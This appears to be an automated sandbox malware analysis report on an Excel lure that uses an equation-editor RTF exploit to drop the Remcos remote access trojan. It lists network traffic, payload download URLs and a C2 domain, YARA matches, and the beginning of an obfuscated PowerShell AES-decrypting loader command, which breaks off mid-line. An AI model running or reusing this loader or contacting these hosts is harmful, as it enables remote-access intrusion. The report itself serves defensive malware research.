              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170

              Networking

              barindex
              Source: Malware configuration extractorURLs: wemberdag.duckdns.org
              Source: simplebeautygirlfrndhaveform.vBS.7.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
              Source: simplebeautygirlfrndhaveform.vBS.7.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
              Source: simplebeautygirlfrndhaveforme[1].gif.7.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
              Source: simplebeautygirlfrndhaveforme[1].gif.7.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
              Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /36/RYND.txt HTTP/1.1Host: 192.227.225.166Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 198.46.176.133 198.46.176.133
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: global trafficHTTP traffic detected: GET /4Gs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /36/hb/createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.225.166Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /36/simplebeautygirlfrndhaveforme.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.225.166Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.225.166
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5F3A75C5.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /4Gs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /36/hb/createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.225.166Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /36/simplebeautygirlfrndhaveforme.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.225.166Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /36/RYND.txt HTTP/1.1Host: 192.227.225.166Connection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: tny.wtf
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 06:24:37 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4GKbrAxCyu4ckcdd7iAo6Tcgp03XtmVNauhTW%2BRSmJpBVdfbISz3z5H2VVSfWhvepwJdddiwDm9DpAxY3Ws6PRi8spA%2FrtdxjnFTBUTzYy8GJUBV%2BIz55ISJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a924ec87aa64313-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 06:24:38 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjeXUPP%2Byx8OMG9N9HzL4IZTz%2BAwP%2F99bGilspcytz3uC41pT1xHW0iGDns6WkkaU5sfrWoXXHX3lCgvV%2BmMaZbTfvy7vrlEBPsIDJbqb323zERZW0REjqej"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a924ece0d584313-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 06:24:38 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NG6Uq5267NqFBP7Uub3HfRj4kZlEOxPXgjo9NgxscAhjB9krNmL4T4ik3i%2Ba%2Fy%2B9KqKrheMllf%2F9tTMRzp7hmj59rUpKPJ5N9H0vyULV3EKq6syPPsRVGHKi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a924ecfde454313-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: powershell.exe, 00000009.00000002.452136835.00000000081C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.227.225.166
              Source: powershell.exe, 00000009.00000002.452136835.00000000081C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.227.225.166/36/RYND.txt
              Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000007.00000002.430940411.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000007.00000002.430940411.00000000005E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.227.225.166/36/simplebeautygirlfrndhaveforme.gIF
              Source: EQNEDT32.EXE, 00000007.00000002.430940411.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.227.225.166/36/simplebeautygirlfrndhaveforme.gIFj
              Source: powershell.exe, 00000009.00000002.447762696.00000000024CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
              Source: powershell.exe, 00000009.00000002.447762696.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.449588027.0000000005032000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.445980970.0000000000020000.00000004.00000020.00040000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
              Source: powershell.exe, 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: powershell.exe, 00000009.00000002.446403842.00000000001CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cU
              Source: powershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000009.00000002.447762696.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: tny.wtf.url.3.drString found in binary or memory: http://tny.wtf/
              Source: #U00d6DEME TAVS#U0130YES#U0130.xls, 4Gs.url.3.drString found in binary or memory: http://tny.wtf/4Gs
              Source: ~DF796D981FE2E9145A.TMP.0.dr, F0630000.0.drString found in binary or memory: http://tny.wtf/4GsyX
              Source: powershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR

              System Summary

              barindex
              Source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C63FEFCD.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsOLE: Microsoft Excel 2007+
              Source: ~DFB88BC22996138750.TMP.0.drOLE: Microsoft Excel 2007+
              Source: F0630000.0.drOLE: Microsoft Excel 2007+
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\4Gs.urlJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.urlJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 